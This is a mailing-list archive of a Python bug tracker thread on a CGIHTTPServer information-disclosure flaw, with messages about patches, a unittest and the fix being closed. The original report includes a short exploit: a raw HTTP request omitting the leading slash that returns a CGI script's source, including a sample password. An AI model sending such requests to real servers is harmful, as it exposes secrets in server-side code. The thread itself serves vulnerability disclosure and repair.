[issue2254] Python CGIHTTPServer information disclosure
Changes by Gregory P. Smith g...@krypto.org: Removed file: http://bugs.python.org/file9628/CGIHTTPServer_is_cgi_fix.diff ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue2254 ___ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith g...@krypto.org added the comment: Fixed in trunk r71303. This potentially changes the behavior of CGIHTTPServer (for the better) so this is probably not appropriate to backport to a release branch unless someone really considers the security of this to be severe. If backported, the new module function should be expanded inline to avoid adding a new (though undocumented) API. Closing. -- resolution: - fixed status: open - closed versions: +Python 2.6, Python 3.0 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue2254 ___ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith g...@krypto.org added the comment: fyi - Your patch does not work on windows as it uses os.path for uri manipulation. that means it behaves differently with regards to / and \ based on platform. I'm making a new one. I've written a unittest. should be fixed soon. -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue2254 ___ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith [EMAIL PROTECTED] added the comment: Could you please create a test case for this as a patch to Lib/test/test_httpservers.py? thanks! -- assignee: - gregory.p.smith nosy: +gregory.p.smith priority: - normal __ Tracker [EMAIL PROTECTED] http://bugs.python.org/issue2254 __ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
New submission from sumar: Summary: An information disclosure flaw exists in standard python CGIHTTPServer module. Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7). Description: Requesting cgi script (in example test.py) without / in the beginnig of URL cause return script content/code instead of script execution. It could lead to disclose some secret information eg. password. Exploit code: Connected to localhost. Escape character is '^]'. GET cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 14:55:30 GMT Content-type: text/plain Content-Length: 150 Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT #!/usr/bin/env python print 'Content-Type: text/html' print 'Cache-Control: no-cache' print print 'Hello' passwd='secret' path=/opt/myapp/secretpath Connection closed by foreign host. correct request: Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 15:01:03 GMT Content-Type: text/html Cache-Control: no-cache Hello Connection closed by foreign host. -- components: Library (Lib) messages: 63361 nosy: m.sucajtys severity: normal status: open title: Python CGIHTTPServer information disclosure type: security versions: Python 2.5 __ Tracker [EMAIL PROTECTED] http://bugs.python.org/issue2254 __ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment: I'm attaching a patch that fixes this, it was done for rev 61179 (trunk). Note that is_cgi method is incorrectly documented, even more now. Only the first line in its docstring is correct now, before this patch, last paragraph was correct too. -- keywords: +patch nosy: +gpolo Added file: http://bugs.python.org/file9628/CGIHTTPServer_is_cgi_fix.diff __ Tracker [EMAIL PROTECTED] http://bugs.python.org/issue2254 __ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment: oops, I was doing some tests in the last patch and left a bug in it. I'm attaching a new one. Added file: http://bugs.python.org/file9629/CGIHTTPServer_is_cgi_fix2.diff __ Tracker [EMAIL PROTECTED] http://bugs.python.org/issue2254 __ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment: This corrects is_cgi docstring (maybe this should be done in a new issue?). It also removes a part of it that I believe to not be necessary, someone correct me if I'm wrong. Added file: http://bugs.python.org/file9632/CGIHTTPServer_is_cgi_doc_fix.diff __ Tracker [EMAIL PROTECTED] http://bugs.python.org/issue2254 __ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com